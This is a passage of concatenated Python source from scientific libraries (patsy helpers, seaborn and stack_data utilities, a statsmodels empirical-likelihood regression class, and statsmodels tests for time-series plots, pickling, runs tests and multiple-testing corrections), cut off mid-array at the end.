return safe_is_pandas_categorical_dtype(data.dtype)
return False
def test_safe_is_pandas_categorical():
assert not safe_is_pandas_categorical(np.arange(10))
if have_pandas_categorical:
c_obj = pandas.Categorical(["a", "b"])
assert safe_is_pandas_categorical(c_obj)
if have_pandas_categorical_dtype:
s_obj = pandas.Series(["a", "b"], dtype="category")
assert safe_is_pandas_categorical(s_obj)
# Needed to support pandas >= 0.15 (!)
# Calling np.issubdtype on a pandas categorical will blow up -- the officially
# recommended solution is to replace every piece of code like
# np.issubdtype(foo.dtype, bool)
# with code like
# isinstance(foo.dtype, np.dtype) and np.issubdtype(foo.dtype, bool)
# or
# not pandas.is_categorical_dtype(foo.dtype) and issubdtype(foo.dtype, bool)
# We do the latter (with extra hoops) because the isinstance check is not
# safe. See
# https://github.com/pydata/pandas/issues/9581
# https://github.com/pydata/pandas/issues/9581#issuecomment-77099564
def safe_issubdtype(dt1, dt2):
if safe_is_pandas_categorical_dtype(dt1):
return False
return np.issubdtype(dt1, dt2)
def test_safe_issubdtype():
assert safe_issubdtype(int, np.integer)
assert safe_issubdtype(np.dtype(float), np.floating)
assert not safe_issubdtype(int, np.floating)
assert not safe_issubdtype(np.dtype(float), np.integer)
if have_pandas_categorical_dtype:
bad_dtype = pandas.Series(["a", "b"], dtype="category")
assert not safe_issubdtype(bad_dtype, np.integer)
def no_pickling(*args, **kwargs):
raise NotImplementedError(
"Sorry, pickling not yet supported. "
"See https://github.com/pydata/patsy/issues/26 if you want to "
"help.")
def assert_no_pickling(obj):
import pickle
import pytest
pytest.raises(NotImplementedError, pickle.dumps, obj)
# Use like:
# if safe_string_eq(constraints, "center"):
# ...
# where 'constraints' might be a string or an array. (If it's an array, then
# we can't use == because it might broadcast and ugh.)
def safe_string_eq(obj, value):
if isinstance(obj, six.string_types):
return obj == value
else:
return False
def test_safe_string_eq():
assert safe_string_eq("foo", "foo")
assert not safe_string_eq("foo", "bar")
if not six.PY3:
assert safe_string_eq(unicode("foo"), "foo")
assert not safe_string_eq(np.empty((2, 2)), "foo")
```
#### File: site-packages/seaborn/_testing.py
```python
import numpy as np
import matplotlib as mpl
from matplotlib.colors import to_rgb, to_rgba
from numpy.testing import assert_array_equal
LINE_PROPS = [
"alpha",
"color",
"linewidth",
"linestyle",
"xydata",
"zorder",
]
COLLECTION_PROPS = [
"alpha",
"edgecolor",
"facecolor",
"fill",
"hatch",
"linestyle",
"linewidth",
"paths",
"zorder",
]
BAR_PROPS = [
"alpha",
"edgecolor",
"facecolor",
"fill",
"hatch",
"height",
"linestyle",
"linewidth",
"xy",
"zorder",
]
def assert_colors_equal(a, b, check_alpha=True):
def handle_array(x):
if isinstance(x, np.ndarray):
if x.ndim > 1:
x = np.unique(x, axis=0).squeeze()
if x.ndim > 1:
raise ValueError("Color arrays must be 1 dimensional")
return x
a = handle_array(a)
b = handle_array(b)
f = to_rgba if check_alpha else to_rgb
assert f(a) == f(b)
def assert_artists_equal(list1, list2, properties):
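    # Compare two artist lists element-wise on the named properties, special-
    # casing Path objects ("paths"), ndarrays, and colors (normalized through
    # to_rgba) so that equivalent artists compare equal.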
assert len(list1) == len(list2)
for a1, a2 in zip(list1, list2):
prop1 = a1.properties()
prop2 = a2.properties()
for key in properties:
v1 = prop1[key]
v2 = prop2[key]
if key == "paths":
for p1, p2 in zip(v1, v2):
assert_array_equal(p1.vertices, p2.vertices)
assert_array_equal(p1.codes, p2.codes)
elif isinstance(v1, np.ndarray):
assert_array_equal(v1, v2)
elif key == "color":
v1 = mpl.colors.to_rgba(v1)
v2 = mpl.colors.to_rgba(v2)
assert v1 == v2
else:
assert v1 == v2
def assert_legends_equal(leg1, leg2):
assert leg1.get_title().get_text() == leg2.get_title().get_text()
for t1, t2 in zip(leg1.get_texts(), leg2.get_texts()):
assert t1.get_text() == t2.get_text()
assert_artists_equal(
leg1.get_patches(), leg2.get_patches(), BAR_PROPS,
)
assert_artists_equal(
leg1.get_lines(), leg2.get_lines(), LINE_PROPS,
)
def assert_plots_equal(ax1, ax2, labels=True):
assert_artists_equal(ax1.patches, ax2.patches, BAR_PROPS)
assert_artists_equal(ax1.lines, ax2.lines, LINE_PROPS)
poly1 = ax1.findobj(mpl.collections.PolyCollection)
poly2 = ax2.findobj(mpl.collections.PolyCollection)
assert_artists_equal(poly1, poly2, COLLECTION_PROPS)
if labels:
assert ax1.get_xlabel() == ax2.get_xlabel()
assert ax1.get_ylabel() == ax2.get_ylabel()
```
#### File: site-packages/stack_data/utils.py
```python
import ast
import itertools
import types
from collections import OrderedDict, Counter, defaultdict
from types import FrameType, TracebackType
from typing import (
Iterator, List, Tuple, Iterable, Callable, Union,
TypeVar, Mapping,
)
T = TypeVar('T')
R = TypeVar('R')
def truncate(seq, max_length: int, middle):
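    # Keep `seq` at most `max_length` items long by splicing `middle` over the
    # centre, e.g. (illustrative) truncate("abcdefghij", 5, "...") -> "a...j".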
if len(seq) > max_length:
right = (max_length - len(middle)) // 2
left = max_length - len(middle) - right
seq = seq[:left] + middle + seq[-right:]
return seq
def unique_in_order(it: Iterable[T]) -> List[T]:
return list(OrderedDict.fromkeys(it))
def line_range(node: ast.AST) -> Tuple[int, int]:
"""
    Returns a pair of numbers representing a half-open range
    (i.e. suitable as arguments to the `range()` builtin)
    of line numbers of the given AST node.
"""
try:
return (
node.first_token.start[0],
node.last_token.end[0] + 1,
)
except AttributeError:
return (
node.lineno,
getattr(node, "end_lineno", node.lineno) + 1,
)
def highlight_unique(lst: List[T]) -> Iterator[Tuple[T, bool]]:
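    # Pair every element with a flag. Values occurring <= 3 times overall are
    # always flagged True; within each consecutive run of "common" values
    # (> 3 occurrences overall) only the first two and the last occurrence of
    # each distinct value are flagged True, so that collapse_repeated below
    # can fold the unflagged repeats together.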
counts = Counter(lst)
for is_common, group in itertools.groupby(lst, key=lambda x: counts[x] > 3):
if is_common:
group = list(group)
highlighted = [False] * len(group)
def highlight_index(f):
try:
i = f()
except ValueError:
return None
highlighted[i] = True
return i
for item in set(group):
first = highlight_index(lambda: group.index(item))
if first is not None:
highlight_index(lambda: group.index(item, first + 1))
highlight_index(lambda: -1 - group[::-1].index(item))
else:
highlighted = itertools.repeat(True)
yield from zip(group, highlighted)
def identity(x: T) -> T:
return x
def collapse_repeated(lst, *, collapser, mapper=identity, key=identity):
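    # Yield mapper(item) for items that highlight_unique keeps; each run of
    # repetitive items is passed to `collapser` as a single group together
    # with the keys (extracted by `key`) that identified them as repeats.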
keyed = list(map(key, lst))
for is_highlighted, group in itertools.groupby(
zip(lst, highlight_unique(keyed)),
key=lambda t: t[1][1],
):
original_group, highlighted_group = zip(*group)
if is_highlighted:
yield from map(mapper, original_group)
else:
keyed_group, _ = zip(*highlighted_group)
yield collapser(list(original_group), list(keyed_group))
def is_frame(frame_or_tb: Union[FrameType, TracebackType]) -> bool:
assert_(isinstance(frame_or_tb, (types.FrameType, types.TracebackType)))
return isinstance(frame_or_tb, (types.FrameType,))
def iter_stack(frame_or_tb: Union[FrameType, TracebackType]) -> Iterator[Union[FrameType, TracebackType]]:
while frame_or_tb:
yield frame_or_tb
if is_frame(frame_or_tb):
frame_or_tb = frame_or_tb.f_back
else:
frame_or_tb = frame_or_tb.tb_next
def frame_and_lineno(frame_or_tb: Union[FrameType, TracebackType]) -> Tuple[FrameType, int]:
if is_frame(frame_or_tb):
return frame_or_tb, frame_or_tb.f_lineno
else:
return frame_or_tb.tb_frame, frame_or_tb.tb_lineno
def group_by_key_func(iterable: Iterable[T], key_func: Callable[[T], R]) -> Mapping[R, List[T]]:
# noinspection PyUnresolvedReferences
"""
Create a dictionary from an iterable such that the keys are the result of evaluating a key function on elements
of the iterable and the values are lists of elements all of which correspond to the key.
>>> def si(d): return sorted(d.items())
>>> si(group_by_key_func("a bb ccc d ee fff".split(), len))
[(1, ['a', 'd']), (2, ['bb', 'ee']), (3, ['ccc', 'fff'])]
>>> si(group_by_key_func([-1, 0, 1, 3, 6, 8, 9, 2], lambda x: x % 2))
[(0, [0, 6, 8, 2]), (1, [-1, 1, 3, 9])]
"""
result = defaultdict(list)
for item in iterable:
result[key_func(item)].append(item)
return result
class cached_property(object):
"""
A property that is only computed once per instance and then replaces itself
with an ordinary attribute. Deleting the attribute resets the property.
Based on https://github.com/pydanny/cached-property/blob/master/cached_property.py
"""
def __init__(self, func):
self.__doc__ = func.__doc__
self.func = func
def cached_property_wrapper(self, obj, _cls):
if obj is None:
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
__get__ = cached_property_wrapper
def _pygmented_with_ranges(formatter, code, ranges):
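    # Highlight `code` with Pygments, wrapping the python3 lexer so that any
    # token whose starting offset falls inside one of `ranges` is tagged with
    # a derived ".ExecutingNode" token type; the formatter can then style the
    # executing node differently. Returns the highlighted source as lines.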
import pygments
from pygments.lexers import get_lexer_by_name
class MyLexer(type(get_lexer_by_name("python3"))):
def get_tokens(self, text):
length = 0
for ttype, value in super().get_tokens(text):
if any(start <= length < end for start, end in ranges):
ttype = ttype.ExecutingNode
length += len(value)
yield ttype, value
lexer = MyLexer(stripnl=False)
return pygments.highlight(code, lexer, formatter).splitlines()
def assert_(condition, error=""):
if not condition:
if isinstance(error, str):
error = AssertionError(error)
raise error
```
#### File: statsmodels/emplike/originregress.py
```python
import numpy as np
from scipy import optimize
from scipy.stats import chi2
from statsmodels.regression.linear_model import OLS, RegressionResults
# When the descriptive statistics module is merged, this will be changed
from statsmodels.tools.tools import add_constant
class ELOriginRegress(object):
"""
Empirical Likelihood inference and estimation for linear regression
through the origin.
Parameters
----------
    endog : nx1 array
        Array of response variables.
    exog : nxk array
        Array of exogenous variables. Assumes no array of ones.
Attributes
----------
endog : nx1 array
Array of response variables
exog : nxk array
Array of exogenous variables. Assumes no array of ones.
nobs : float
Number of observations.
nvar : float
Number of exogenous regressors.
"""
def __init__(self, endog, exog):
self.endog = endog
self.exog = exog
self.nobs = self.exog.shape[0]
try:
self.nvar = float(exog.shape[1])
except IndexError:
self.nvar = 1.
def fit(self):
"""
Fits the model and provides regression results.
Returns
-------
Results : class
Empirical likelihood regression class.
"""
exog_with = add_constant(self.exog, prepend=True)
restricted_model = OLS(self.endog, exog_with)
restricted_fit = restricted_model.fit()
restricted_el = restricted_fit.el_test(
np.array([0]), np.array([0]), ret_params=1)
params = np.squeeze(restricted_el[3])
beta_hat_llr = restricted_el[0]
llf = np.sum(np.log(restricted_el[2]))
return OriginResults(restricted_model, params, beta_hat_llr, llf)
def predict(self, params, exog=None):
if exog is None:
exog = self.exog
return np.dot(add_constant(exog, prepend=True), params)
class OriginResults(RegressionResults):
"""
A Results class for empirical likelihood regression through the origin.
Parameters
----------
model : class
An OLS model with an intercept.
params : 1darray
Fitted parameters.
est_llr : float
The log likelihood ratio of the model with the intercept restricted to
0 at the maximum likelihood estimates of the parameters.
        (llr_restricted / llr_unrestricted).
llf_el : float
The log likelihood of the fitted model with the intercept restricted to 0.
Attributes
----------
model : class
An OLS model with an intercept.
params : 1darray
Fitted parameter.
llr : float
The log likelihood ratio of the maximum empirical likelihood estimate.
llf_el : float
The log likelihood of the fitted model with the intercept restricted to 0.
Notes
-----
    IMPORTANT. Since EL estimation does not drop the intercept parameter but
    instead estimates the slope parameters conditional on the intercept
    parameter being 0, the first element of params will be the intercept,
    which is restricted to 0.
IMPORTANT. This class inherits from RegressionResults but inference is
conducted via empirical likelihood. Therefore, any methods that
require an estimate of the covariance matrix will not function. Instead
use el_test and conf_int_el to conduct inference.
Examples
--------
>>> import statsmodels.api as sm
>>> data = sm.datasets.bc.load()
>>> model = sm.emplike.ELOriginRegress(data.endog, data.exog)
>>> fitted = model.fit()
>>> fitted.params # 0 is the intercept term.
array([ 0. , 0.00351813])
>>> fitted.el_test(np.array([.0034]), np.array([1]))
(3.6696503297979302, 0.055411808127497755)
>>> fitted.conf_int_el(1)
(0.0033971871114706867, 0.0036373150174892847)
# No covariance matrix so normal inference is not valid
>>> fitted.conf_int()
TypeError: unsupported operand type(s) for *: 'instancemethod' and 'float'
"""
def __init__(self, model, params, est_llr, llf_el):
self.model = model
self.params = np.squeeze(params)
self.llr = est_llr
self.llf_el = llf_el
def el_test(self, b0_vals, param_nums, method='nm',
stochastic_exog=1, return_weights=0):
"""
Returns the llr and p-value for a hypothesized parameter value
for a regression that goes through the origin.
Parameters
----------
b0_vals : 1darray
The hypothesized value to be tested.
        param_nums : 1darray
            Which parameters to test. Note this uses python
            indexing, but the '0' parameter refers to the intercept term,
            which is assumed to be 0. Therefore, param_nums should be > 0.
        return_weights : bool
            If True, returns the weights that optimize the likelihood
            ratio at b0_vals. Default is False.
method : str
Can either be 'nm' for Nelder-Mead or 'powell' for Powell. The
optimization method that optimizes over nuisance parameters.
Default is 'nm'.
        stochastic_exog : bool
            When True, the exogenous variables are assumed to be stochastic.
            When the regressors are nonstochastic, moment conditions are
            placed on the exogenous variables. Confidence intervals for
            stochastic regressors are at least as large as those for
            non-stochastic regressors. Default is True.
Returns
-------
res : tuple
            The likelihood ratio and p-value, plus the EL weights when
            return_weights is True.
"""
b0_vals = np.hstack((0, b0_vals))
param_nums = np.hstack((0, param_nums))
test_res = self.model.fit().el_test(b0_vals, param_nums, method=method,
stochastic_exog=stochastic_exog,
return_weights=return_weights)
llr_test = test_res[0]
llr_res = llr_test - self.llr
pval = chi2.sf(llr_res, self.model.exog.shape[1] - 1)
if return_weights:
return llr_res, pval, test_res[2]
else:
return llr_res, pval
def conf_int_el(self, param_num, upper_bound=None,
lower_bound=None, sig=.05, method='nm',
stochastic_exog=1):
"""
Returns the confidence interval for a regression parameter when the
regression is forced through the origin.
Parameters
----------
param_num : int
The parameter number to be tested. Note this uses python
indexing but the '0' parameter refers to the intercept term.
upper_bound : float
The maximum value the upper confidence limit can be. The
closer this is to the confidence limit, the quicker the
computation. Default is .00001 confidence limit under normality.
lower_bound : float
The minimum value the lower confidence limit can be.
Default is .00001 confidence limit under normality.
sig : float, optional
The significance level. Default .05.
method : str, optional
            Algorithm used to optimize over the nuisance parameters. Can be
            'nm' or 'powell'. Default is 'nm'.
Returns
-------
ci: tuple
The confidence interval for the parameter 'param_num'.
"""
r0 = chi2.ppf(1 - sig, 1)
param_num = np.array([param_num])
if upper_bound is None:
upper_bound = (np.squeeze(self.model.fit().
conf_int(.0001)[param_num])[1])
if lower_bound is None:
lower_bound = (np.squeeze(self.model.fit().conf_int(.00001)
[param_num])[0])
f = lambda b0: self.el_test(np.array([b0]), param_num,
method=method,
stochastic_exog=stochastic_exog)[0] - r0
lowerl = optimize.brentq(f, lower_bound, self.params[param_num])
upperl = optimize.brentq(f, self.params[param_num], upper_bound)
return (lowerl, upperl)
```
#### File: graphics/tests/test_tsaplots.py
```python
from statsmodels.compat.python import lmap
import calendar
from io import BytesIO
import locale
import numpy as np
from numpy.testing import assert_, assert_equal
import pandas as pd
import pytest
from statsmodels.datasets import elnino, macrodata
from statsmodels.graphics.tsaplots import (
month_plot,
plot_acf,
plot_pacf,
plot_predict,
quarter_plot,
seasonal_plot,
)
from statsmodels.tsa import arima_process as tsp
from statsmodels.tsa.ar_model import AutoReg
from statsmodels.tsa.arima.model import ARIMA
try:
from matplotlib import pyplot as plt
except ImportError:
pass
@pytest.mark.matplotlib
def test_plot_acf(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
plot_acf(acf, ax=ax, lags=10)
plot_acf(acf, ax=ax)
plot_acf(acf, ax=ax, alpha=None)
@pytest.mark.matplotlib
def test_plot_acf_irregular(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
plot_acf(acf, ax=ax, lags=np.arange(1, 11))
plot_acf(acf, ax=ax, lags=10, zero=False)
plot_acf(acf, ax=ax, alpha=None, zero=False)
@pytest.mark.matplotlib
def test_plot_pacf(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
with pytest.warns(FutureWarning):
plot_pacf(pacf, ax=ax)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, alpha=None)
@pytest.mark.matplotlib
def test_plot_pacf_kwargs(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
buff = BytesIO()
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax)
fig.savefig(buff, format="rgba")
buff_linestyle = BytesIO()
fig_linestyle = plt.figure()
ax = fig_linestyle.add_subplot(111)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, ls="-")
fig_linestyle.savefig(buff_linestyle, format="rgba")
buff_with_vlines = BytesIO()
fig_with_vlines = plt.figure()
ax = fig_with_vlines.add_subplot(111)
vlines_kwargs = {"linestyles": "dashdot"}
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, vlines_kwargs=vlines_kwargs)
fig_with_vlines.savefig(buff_with_vlines, format="rgba")
buff.seek(0)
buff_linestyle.seek(0)
buff_with_vlines.seek(0)
plain = buff.read()
linestyle = buff_linestyle.read()
with_vlines = buff_with_vlines.read()
assert_(plain != linestyle)
assert_(with_vlines != plain)
assert_(linestyle != with_vlines)
@pytest.mark.matplotlib
def test_plot_acf_kwargs(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
buff = BytesIO()
plot_acf(acf, ax=ax)
fig.savefig(buff, format="rgba")
buff_with_vlines = BytesIO()
fig_with_vlines = plt.figure()
ax = fig_with_vlines.add_subplot(111)
vlines_kwargs = {"linestyles": "dashdot"}
plot_acf(acf, ax=ax, vlines_kwargs=vlines_kwargs)
fig_with_vlines.savefig(buff_with_vlines, format="rgba")
buff.seek(0)
buff_with_vlines.seek(0)
plain = buff.read()
with_vlines = buff_with_vlines.read()
assert_(with_vlines != plain)
@pytest.mark.matplotlib
def test_plot_acf_missing(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
acf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
acf[::13] = np.nan
buff = BytesIO()
plot_acf(acf, ax=ax, missing="drop")
fig.savefig(buff, format="rgba")
buff.seek(0)
fig = plt.figure()
ax = fig.add_subplot(111)
buff_conservative = BytesIO()
plot_acf(acf, ax=ax, missing="conservative")
fig.savefig(buff_conservative, format="rgba")
buff_conservative.seek(0)
assert_(buff.read() != buff_conservative.read())
@pytest.mark.matplotlib
def test_plot_pacf_irregular(close_figures):
# Just test that it runs.
fig = plt.figure()
ax = fig.add_subplot(111)
ar = np.r_[1.0, -0.9]
ma = np.r_[1.0, 0.9]
armaprocess = tsp.ArmaProcess(ar, ma)
rs = np.random.RandomState(1234)
pacf = armaprocess.generate_sample(100, distrvs=rs.standard_normal)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, lags=np.arange(1, 11))
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, lags=10, zero=False)
with pytest.warns(FutureWarning, match="The default"):
plot_pacf(pacf, ax=ax, alpha=None, zero=False)
@pytest.mark.matplotlib
def test_plot_month(close_figures):
dta = elnino.load_pandas().data
dta["YEAR"] = dta.YEAR.astype(int).apply(str)
dta = dta.set_index("YEAR").T.unstack()
dates = pd.to_datetime(["-".join([x[1], x[0]]) for x in dta.index.values])
# test dates argument
fig = month_plot(dta.values, dates=dates, ylabel="el nino")
# test with a TimeSeries DatetimeIndex with no freq
dta.index = pd.DatetimeIndex(dates)
fig = month_plot(dta)
# w freq
dta.index = pd.DatetimeIndex(dates, freq="MS")
fig = month_plot(dta)
# test with a TimeSeries PeriodIndex
dta.index = pd.PeriodIndex(dates, freq="M")
fig = month_plot(dta)
# test localized xlabels
try:
with calendar.different_locale("DE_de"):
fig = month_plot(dta)
labels = [_.get_text() for _ in fig.axes[0].get_xticklabels()]
expected = [
"Jan",
"Feb",
("Mär", "Mrz"),
"Apr",
"Mai",
"Jun",
"Jul",
"Aug",
"Sep",
"Okt",
"Nov",
"Dez",
]
for lbl, exp in zip(labels, expected):
if isinstance(exp, tuple):
assert lbl in exp
else:
assert lbl == exp
except locale.Error:
pytest.xfail(reason="Failure due to unsupported locale")
@pytest.mark.matplotlib
def test_plot_quarter(close_figures):
dta = macrodata.load_pandas().data
dates = lmap(
"Q".join,
zip(
dta.year.astype(int).apply(str), dta.quarter.astype(int).apply(str)
),
)
# test dates argument
quarter_plot(dta.unemp.values, dates)
# test with a DatetimeIndex with no freq
dta.set_index(pd.to_datetime(dates), inplace=True)
quarter_plot(dta.unemp)
# w freq
# see pandas #6631
dta.index = pd.DatetimeIndex(pd.to_datetime(dates), freq="QS-Oct")
quarter_plot(dta.unemp)
# w PeriodIndex
dta.index = pd.PeriodIndex(pd.to_datetime(dates), freq="Q")
quarter_plot(dta.unemp)
@pytest.mark.matplotlib
def test_seasonal_plot(close_figures):
rs = np.random.RandomState(1234)
data = rs.randn(20, 12)
data += 6 * np.sin(np.arange(12.0) / 11 * np.pi)[None, :]
data = data.ravel()
months = np.tile(np.arange(1, 13), (20, 1))
months = months.ravel()
df = pd.DataFrame([data, months], index=["data", "months"]).T
grouped = df.groupby("months")["data"]
labels = [
"Jan",
"Feb",
"Mar",
"Apr",
"May",
"Jun",
"Jul",
"Aug",
"Sep",
"Oct",
"Nov",
"Dec",
]
fig = seasonal_plot(grouped, labels)
ax = fig.get_axes()[0]
output = [tl.get_text() for tl in ax.get_xticklabels()]
assert_equal(labels, output)
@pytest.mark.matplotlib
@pytest.mark.parametrize(
"model_and_args",
[(AutoReg, dict(lags=2, old_names=False)), (ARIMA, dict(order=(2, 0, 0)))],
)
@pytest.mark.parametrize("use_pandas", [True, False])
@pytest.mark.parametrize("alpha", [None, 0.10])
def test_predict_plot(use_pandas, model_and_args, alpha):
model, kwargs = model_and_args
rs = np.random.RandomState(0)
y = rs.standard_normal(1000)
for i in range(2, 1000):
y[i] += 1.8 * y[i - 1] - 0.9 * y[i - 2]
y = y[100:]
if use_pandas:
index = pd.date_range("1960-1-1", freq="M", periods=y.shape[0] + 24)
start = index[index.shape[0] // 2]
end = index[-1]
y = pd.Series(y, index=index[:-24])
else:
start = y.shape[0] // 2
end = y.shape[0] + 24
res = model(y, **kwargs).fit()
fig = plot_predict(res, start, end, alpha=alpha)
assert isinstance(fig, plt.Figure)
```
#### File: iolib/tests/test_pickle.py
```python
from statsmodels.compat.python import lrange
from io import BytesIO
import os
import pathlib
import tempfile
from numpy.testing import assert_equal
from statsmodels.iolib.smpickle import load_pickle, save_pickle
def test_pickle():
tmpdir = tempfile.mkdtemp(prefix="pickle")
a = lrange(10)
# test with str
path_str = tmpdir + "/res.pkl"
save_pickle(a, path_str)
b = load_pickle(path_str)
assert_equal(a, b)
# test with pathlib
path_pathlib = pathlib.Path(tmpdir) / "res2.pkl"
save_pickle(a, path_pathlib)
c = load_pickle(path_pathlib)
assert_equal(a, c)
# cleanup, tested on Windows
try:
os.remove(path_str)
os.remove(path_pathlib)
os.rmdir(tmpdir)
except (OSError, IOError):
pass
assert not os.path.exists(tmpdir)
# test with file handle
fh = BytesIO()
save_pickle(a, fh)
fh.seek(0, 0)
d = load_pickle(fh)
fh.close()
assert_equal(a, d)
def test_pickle_supports_open():
tmpdir = tempfile.mkdtemp(prefix="pickle")
a = lrange(10)
class SubPath:
def __init__(self, path):
self._path = pathlib.Path(path)
def open(
self,
mode="r",
buffering=-1,
encoding=None,
errors=None,
newline=None,
):
return self._path.open(
mode=mode,
buffering=buffering,
encoding=encoding,
errors=errors,
newline=newline,
)
    # test with an object that exposes an open() method
    path_pathlib = SubPath(os.path.join(tmpdir, "res2.pkl"))
save_pickle(a, path_pathlib)
c = load_pickle(path_pathlib)
assert_equal(a, c)
```
#### File: stats/tests/test_runs.py
```python
from numpy.testing import assert_almost_equal
from statsmodels.sandbox.stats.runs import runstest_1samp
def test_mean_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = "mean"
expected = (-4.007095978613213, 6.146988816717466e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
def test_median_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = "median"
expected = (-3.944254410803499, 8.004864125547193e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
def test_numeric_cutoff():
x = [1] * 5 + [2] * 6 + [3] * 8
cutoff = 2
expected = (-3.944254410803499, 8.004864125547193e-05)
results = runstest_1samp(x, cutoff=cutoff, correction=False)
assert_almost_equal(expected, results)
```
#### File: stats/tests/test_multi.py
```python
import pytest
import numpy as np
from numpy.testing import (assert_almost_equal, assert_equal,
assert_allclose)
from statsmodels.stats.multitest import (multipletests, fdrcorrection,
fdrcorrection_twostage,
NullDistribution,
local_fdr, multitest_methods_names)
from statsmodels.stats.multicomp import tukeyhsd
from scipy.stats.distributions import norm
pval0 = np.array([
0.838541367553, 0.642193923795, 0.680845947633,
0.967833824309, 0.71626938238, 0.177096952723, 5.23656777208e-005,
0.0202732688798, 0.00028140506198, 0.0149877310796])
res_multtest1 = np.array([
[5.2365677720800003e-05, 5.2365677720800005e-04,
5.2365677720800005e-04, 5.2365677720800005e-04,
5.2353339704891422e-04, 5.2353339704891422e-04,
5.2365677720800005e-04, 1.5337740764175588e-03],
[2.8140506198000000e-04, 2.8140506197999998e-03,
2.5326455578199999e-03, 2.5326455578199999e-03,
2.8104897961789277e-03, 2.5297966317768816e-03,
1.4070253098999999e-03, 4.1211324652269442e-03],
[1.4987731079600001e-02, 1.4987731079600000e-01,
1.1990184863680001e-01, 1.1990184863680001e-01,
1.4016246580579017e-01, 1.1379719679449507e-01,
4.9959103598666670e-02, 1.4632862843720582e-01],
[2.0273268879800001e-02, 2.0273268879799999e-01,
1.4191288215860001e-01, 1.4191288215860001e-01,
1.8520270949069695e-01, 1.3356756197485375e-01,
5.0683172199499998e-02, 1.4844940238274187e-01],
[1.7709695272300000e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
8.5760763426056130e-01, 6.8947825122356643e-01,
3.5419390544599999e-01, 1.0000000000000000e+00],
[6.4219392379499995e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9996560644133570e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[6.8084594763299999e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9998903512635740e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[7.1626938238000004e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999661886871472e-01, 9.9413539782557070e-01,
8.9533672797500008e-01, 1.0000000000000000e+00],
[8.3854136755300002e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999998796038225e-01, 9.9413539782557070e-01,
9.3171263061444454e-01, 1.0000000000000000e+00],
[9.6783382430900000e-01, 1.0000000000000000e+00,
1.0000000000000000e+00, 9.6783382430900000e-01,
9.9999999999999878e-01, 9.9413539782557070e-01,
9.6783382430900000e-01, 1.0000000000000000e+00]])
res_multtest2_columns = [
'rawp', 'Bonferroni', 'Holm', 'Hochberg', 'SidakSS', 'SidakSD',
'BH', 'BY', 'ABH', 'TSBH_0.05']
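# Map each R multtest column name to (column index in the result arrays,
# statsmodels `multipletests` method code) so the tests below can line the
# two implementations up column by column.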
rmethods = {
'rawp': (0, 'pval'),
'Bonferroni': (1, 'b'),
'Holm': (2, 'h'),
'Hochberg': (3, 'sh'),
'SidakSS': (4, 's'),
'SidakSD': (5, 'hs'),
'BH': (6, 'fdr_i'),
'BY': (7, 'fdr_n'),
'TSBH_0.05': (9, 'fdr_tsbh')
}
NA = np.nan
# all rejections, except for Bonferroni and Sidak
res_multtest2 = np.array([
0.002, 0.004, 0.006, 0.008, 0.01, 0.012, 0.012, 0.024, 0.036, 0.048,
0.06, 0.072, 0.012, 0.02, 0.024, 0.024, 0.024, 0.024, 0.012, 0.012,
0.012, 0.012, 0.012, 0.012, 0.01194015976019192, 0.02376127616613988,
0.03546430060660932, 0.04705017875634587, 0.058519850599,
0.06987425045000606, 0.01194015976019192, 0.01984063872102404,
0.02378486270400004, 0.023808512, 0.023808512, 0.023808512, 0.012,
0.012, 0.012, 0.012, 0.012, 0.012, 0.0294, 0.0294, 0.0294, 0.0294,
0.0294, 0.0294, NA, NA, NA, NA, NA, NA, 0, 0, 0, 0, 0, 0
]).reshape(6, 10, order='F')
res_multtest3 = np.array([
